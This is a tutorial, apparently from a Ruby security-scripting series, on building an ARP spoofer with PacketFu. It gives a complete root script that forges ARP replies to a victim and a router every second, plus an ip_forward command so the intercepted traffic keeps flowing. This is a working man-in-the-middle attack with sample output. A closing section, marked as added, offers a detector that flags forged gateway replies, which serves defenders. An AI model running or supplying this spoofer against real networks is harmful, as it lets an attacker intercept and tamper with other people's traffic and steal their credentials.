ARP Spoofing

As you know, ARP spoofing is at the core of MitM attacks. In this part we'll see how to write a simple and effective ARP spoofer to use in later spoofing attacks.

Scenario

We have 3 machines in this scenario as shown below.

```
|Attacker|
    |
    v
|Victim| -----------------> |Router| ---> Internet
```

Here is the list of IP and MAC addresses of each of them in the following table[^1]:

| Host/Info | IP Address    | MAC Address       |
|-----------|---------------|-------------------|
| Attacker  | 192.168.0.100 | 3C:77:E6:68:66:E9 |
| Victim    | 192.168.0.21  | 00:0C:29:38:1D:61 |
| Router    | 192.168.0.1   | 00:50:7F:E6:96:20 |

To get our (the attacker's) interface information:

```ruby
info = PacketFu::Utils.whoami?(:iface => "wlan0")
```

This returns a hash:

```ruby
{:iface=>"wlan0",
 :pcapfile=>"/tmp/out.pcap",
 :eth_saddr=>"3c:77:e6:68:66:e9",
 :eth_src=>"<w\xE6hf\xE9",
 :ip_saddr=>"192.168.0.13",
 :ip_src=>3232235533,
 :ip_src_bin=>"\xC0\xA8\x00\r",
 :eth_dst=>"\x00P\x7F\xE6\x96 ",
 :eth_daddr=>"00:50:7f:e6:96:20"}
```

So you can extract this information as from any hash: info[:iface], info[:ip_saddr], info[:eth_saddr], etc.

Building victim’s ARP packet

```ruby
# Build Ethernet header
arp_packet_victim = PacketFu::ARPPacket.new
arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61" # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61" # the victim's MAC address
arp_packet_victim.arp_saddr_ip = "192.168.0.1" # the router's IP
arp_packet_victim.arp_daddr_ip = "192.168.0.21" # the victim's IP
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply
```

Building router packet

```ruby
# Build Ethernet header
arp_packet_router = PacketFu::ARPPacket.new
arp_packet_router.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_router.eth_daddr = "00:50:7F:E6:96:20" # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20" # the router's MAC address
arp_packet_router.arp_saddr_ip = "192.168.0.21" # the victim's IP
arp_packet_router.arp_daddr_ip = "192.168.0.1" # the router's IP
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply
```

Running the ARP spoofing attack

```ruby
# Send our packets through the wire
while true
  sleep 1
  puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  arp_packet_victim.to_w(info[:iface])
  puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  arp_packet_router.to_w(info[:iface])
end
```

Source[^2]

Wrapping it all together (run as root)

```ruby
#!/usr/bin/env ruby
#
# ARP Spoof Basic script
#
require 'packetfu'
attacker_mac = "3C:77:E6:68:66:E9"
victim_ip = "192.168.0.21"
victim_mac = "00:0C:29:38:1D:61"
router_ip = "192.168.0.1"
router_mac = "00:50:7F:E6:96:20"
info = PacketFu::Utils.whoami?(:iface => "wlan0")
#
# Victim
#
# Build Ethernet header
arp_packet_victim = PacketFu::ARPPacket.new
arp_packet_victim.eth_saddr = attacker_mac # attacker MAC address
arp_packet_victim.eth_daddr = victim_mac # the victim's MAC address
# Build ARP Packet
arp_packet_victim.arp_saddr_mac = attacker_mac # attacker MAC address
arp_packet_victim.arp_daddr_mac = victim_mac # the victim's MAC address
arp_packet_victim.arp_saddr_ip = router_ip # the router's IP
arp_packet_victim.arp_daddr_ip = victim_ip # the victim's IP
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply
#
# Router
#
# Build Ethernet header
arp_packet_router = PacketFu::ARPPacket.new
arp_packet_router.eth_saddr = attacker_mac # attacker MAC address
arp_packet_router.eth_daddr = router_mac # the router's MAC address
# Build ARP Packet
arp_packet_router.arp_saddr_mac = attacker_mac # attacker MAC address
arp_packet_router.arp_daddr_mac = router_mac # the router's MAC address
arp_packet_router.arp_saddr_ip = victim_ip # the victim's IP
arp_packet_router.arp_daddr_ip = router_ip # the router's IP
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply
# Send both forged replies once a second
while true
  sleep 1
  puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
  arp_packet_victim.to_w(info[:iface])
  puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
  arp_packet_router.to_w(info[:iface])
end
```

Note: don't forget to enable packet forwarding on your system so the victim can still browse the internet.

```bash
echo "1" > /proc/sys/net/ipv4/ip_forward
```

The output, and time to go wiresharking ;)

```
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
.
.
.
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
[+] Sending ARP packet to victim: 192.168.0.21
[+] Sending ARP packet to router: 192.168.0.1
```
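From the defender's side, here is an added example (not part of the original post) of how the unsolicited replies this script emits can be spotted: a small pure-Ruby parser that decodes raw Ethernet/ARP frames and flags a sender MAC that disagrees with a known gateway binding. The helper names, the baseline table and the sample frames are constructed for this example; the MAC and IP values are those of the scenario table above.

```ruby
# Added example (not from the original post): a minimal ARP-spoof detector that
# parses raw Ethernet/ARP frames and flags replies contradicting a known baseline.
ETH_ARP   = 0x0806
ARP_REPLY = 2
def mac_str(bytes)  # 6 raw bytes -> "3c:77:e6:68:66:e9"
  bytes.unpack('C6').map { |b| format('%02x', b) }.join(':')
end
def ip_str(bytes)   # 4 raw bytes -> "192.168.0.1"
  bytes.unpack('C4').join('.')
end

# Parse one Ethernet frame; returns a hash for ARP, nil for anything else.
def parse_arp(frame)
  return nil if frame.bytesize < 42
  eth_dst, eth_src, eth_type = frame.unpack('a6 a6 n')
  return nil unless eth_type == ETH_ARP
  # ARP header: htype(2) ptype(2) hlen(1) plen(1) op(2) sha(6) spa(4) tha(6) tpa(4)
  op, sha, spa, tha, tpa = frame.byteslice(14, 28).unpack('x6 n a6 a4 a6 a4')
  { eth_src: mac_str(eth_src), eth_dst: mac_str(eth_dst), op: op,
    sha: mac_str(sha), spa: ip_str(spa), tha: mac_str(tha), tpa: ip_str(tpa) }
end

# baseline: {"ip" => "mac"} learned out of band (e.g. from DHCP snooping).
# Returns one alert string per ARP reply whose sender MAC disagrees with it.
def detect_spoof(frames, baseline)
  table, alerts = baseline.dup, []
  frames.each do |f|
    p = parse_arp(f)
    next unless p && p[:op] == ARP_REPLY
    known = table[p[:spa]]
    if known && known != p[:sha]
      alerts << "#{p[:spa]} announced by #{p[:sha]}, expected #{known}"
    else
      table[p[:spa]] = p[:sha]  # first sighting: learn the binding
    end
  end
  alerts
end

# Constructed sample frames: a genuine gateway reply, then a forged reply that
# claims the gateway IP with the attacker's MAC (what the script above emits).
def arp_reply_frame(eth_src, sha, spa, tha, tpa)
  m = ->(s) { s.split(':').map(&:hex).pack('C6') }
  i = ->(s) { s.split('.').map(&:to_i).pack('C4') }
  [m[tha], m[eth_src], ETH_ARP].pack('a6 a6 n') +
    [1, 0x0800, 6, 4, ARP_REPLY, m[sha], i[spa], m[tha], i[tpa]].pack('n n C C n a6 a4 a6 a4')
end
ROUTER, VICTIM, ATTACKER = '00:50:7f:e6:96:20', '00:0c:29:38:1d:61', '3c:77:e6:68:66:e9'
SAMPLE_FRAMES = [arp_reply_frame(ROUTER,   ROUTER,   '192.168.0.1', VICTIM, '192.168.0.21'),
                 arp_reply_frame(ATTACKER, ATTACKER, '192.168.0.1', VICTIM, '192.168.0.21')]
BASELINE = { '192.168.0.1' => ROUTER }
```

Feeding the frames in order yields one alert for the second frame only; on a real segment the frames would come from a capture (e.g. PacketFu's capture or a pcap file) and the baseline from switch DHCP snooping or a static gateway entry.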

[^1]: Create table the easy way - Table Generator

[^2]: Source: DNS Spoofing Using PacketFu